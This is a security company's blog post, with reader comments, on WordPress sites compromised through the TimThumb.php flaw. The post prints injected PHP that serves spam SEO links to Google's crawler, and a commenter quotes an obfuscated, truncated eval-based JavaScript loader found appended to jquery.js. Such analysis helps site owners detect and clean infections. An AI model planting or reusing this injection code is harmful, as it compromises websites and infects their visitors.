TimThumb.php Attacks – Now Being Used for Blackhat Spam SEO and Might Break Your Site

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is sites getting compromised to load links for blackhat seo purposes. They have their wp-settings.php modified with the following code:

function google_bot() {$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]);if(!(strpos($sUserAgent, ‘google’) === false)) {if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){$ch = curl_init("’.$_SERVER[‘REMOTE_ADDR"].’&host=’.$_SERVER[‘HTTP_HOST’].
[‘HTTP_REFERER’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 10);$re = curl_exec($ch);curl_close($ch);echo $re;}}}add_action(‘wp_footer’, "google_bot");

What this code does is very simple. It connects to to get a few links to be added to the bottom of your site. Links like:

 <a href="http://albertasportswear.com /wp-content/uploads/sweaters/sweater_tights&#46html" alt="Sweater 
Tights" title="Sweater Tights">Sweater Tights</a>
 dilbert sweater vest comic
<br>knitting softwares
 the knitting room fond du lac
 <a href="http://bettyoctopus.com /wp-content/uploads/knitting/knitting_instructions&#46html" alt="Knitting 
Instructions" title="Knitting Instructions">Knitting Instructions</a>
 knitting little luxuries louisa harding

It’s very dynamic, always changing. So in addition to having malware and infecting your users, you could be helping the attackers with page rank as well.

What is interesting is that on some sites the attackers are not only attempting to infect, but are doing it incorrectly leaving some extra lines at the bottom of the wp-settings.php, causing the sites to fail with this error:

Warning: Cannot modify header information – headers already sent by (output started at /home/site/public_html/wp-settings.php:310) in /home1/site/public_html/wp-includes/pluggable.php on line 890

So if you have this warning (headers already sent by (output started at /home/site/public_html/wp-settings.php:310) on your site, it means you are likely compromised as well.

You can check your site here to see if it has this issue: Sucuri SiteCheck

If you need help cleaning up up, sign up here: http://sucuri.net/signup

      1. Yes, in fact that is was makes more sense, but they must be hidding it really well. Were you able to detect any other backdoors besides the one described earlier?

  1. Just noticed all my WP installation were hit with this same malware.  I thought I had everything fixed and updated.  Anyone have an idea where the backdoor may be?

  2. I found that in one of my sites that had come through your scanner as clean.  Just a few minutes ago.  Thanks for keeping up the great information on this.

  3. Not sure if this came in through Timthumb. I updated the script on my wp site and chmoded it to 644 already several days ago. Then my a/v set off an alarm today when I surfed to my site.

    Your site scanner didn’t detect it (yet) but I decided to check all the files on my site anyway.

    Found this at the end of  jquery.js and all the jquery.minXXX.js files. Plus, all the files and folders on my site had been chmodded to 777!

    var lK0LEmv=3243408; var ofa5OVnde=9709687; var xDlN28CbW=42025; var sIAF695=371784; var vww = new Array(13282956, 13282971, 13282964, 13282953, 13282970, 13282959, 13282965, 13282964, 13282886, 13282931, 13282951, 13282961, 13282955, 13282924, 13282968, 13282951, 13282963, 13282955, …
    13282913, 13282979);GPifTs = “”;for (xIZFe = 0; xIZFe < vww.length; xIZFe ++) { GPifTs = GPifTs + String.fromCharCode(vww[xIZFe]-sIAF695+xDlN28CbW-ofa5OVnde-lK0LEmv); }; eval(GPifTs); 

    1. The scanner should have detected this one… Can you send us the full content of the file?

  4. I have a site with custom posts where half of them seemed to vanish, and the only possible culprit we have been able to come up with is this TimThumb hack.

    Has anyone seen this TimThumb issue cause posts to disappear?

Comments are closed.

You May Also Like